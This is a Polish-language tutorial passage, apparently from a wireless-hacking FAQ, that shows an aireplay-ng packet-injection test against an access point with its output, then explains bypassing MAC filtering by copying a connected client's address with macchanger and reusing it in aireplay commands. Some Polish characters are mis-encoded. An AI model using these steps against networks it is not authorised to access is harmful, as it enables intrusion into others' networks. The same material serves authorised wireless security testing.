[ Pobierz całość w formacie PDF ]
Jak sprawdzić, czy mogę się swobodnie komunikować z AP?A bardzo prosto. Do tego celu można wykorzystać injection test, który jest częciš aireplay'a. Najpierw musimy ustawić naszš kartę na ten kanał, na którym nadaje interesujšcy nas AP (airodump robi to sam), a następnie wydać komendę :# aireplay-ng -9 -e FreakShow mon0Spowoduje to przetestowanie injekcji na interfejsie mon0. Celem testu będzie AP o ESSID FreakShow. Program zwróci nam (oczywicie, jeli injekcja się uda) następujšce komunikaty :01:11:11 Waiting for beacon frame (ESSID: FreakShow) on channel 3Found BSSID "00:14:BF:C9:10:43" to given ESSID "FreakShow".01:11:11 Trying broadcast probe requests...01:11:11 Injection is working!01:11:13 Found 1 AP01:11:13 Trying directed probe requests...01:11:13 00:14:BF:C9:10:43 - channel: 3 - 'FreakShow'01:11:16 Ping (min/avg/max): 1.638ms/82.350ms/101.675ms Power: 225.0001:11:16 30/30: 100%Z nich wynika, że AP odpowiedziało na 100% naszych zapytań. Jest to bardzo przydatne narzędzie.Nie mogę połšczyć się z AP.To pewnie dlatego, że włšczone zostało na nim filtrowanie MAC. AP nie będzie dopuszczał do uwierzytelnienia żadnych klientów poza tymi, których ma zapisanych na licie. Na szczęcie zabezpieczenie to można łatwo obejć. Poczekaj po prostu (inna sprawa, że można doć długo czekać) aż airodump pokaże, że do interesujšcego Ciebie AP dołšczył się jaki klient. Wtedy spisz jego adres MAC i wydaj następujšcš komendę :# macchanger --mac=XX:XX:XX:XX:XX:XX wlan0Zastępujšc iksy literkami i cyferkami z adresu klienta. Po dokonaniu tej operacji musisz jeszcze pokombinować z airmon-ng w celu najpierw zniszczenia interfejsu mon0, a póniej utworzenia go na nowo - aby wysyłany był już ten "udawany" MAC.Jeli będziesz chciał korzystać z injekcji, do wszystkich komend aireplay'a dopisz -h XX:XX:XX:XX:XX:XX, zastępujšc iksy nieprawdziwym MACem. Pod żadnym warunkiem jednak nie wykonuj fakeauth'u!strona główna [ Pobierz całość w formacie PDF ]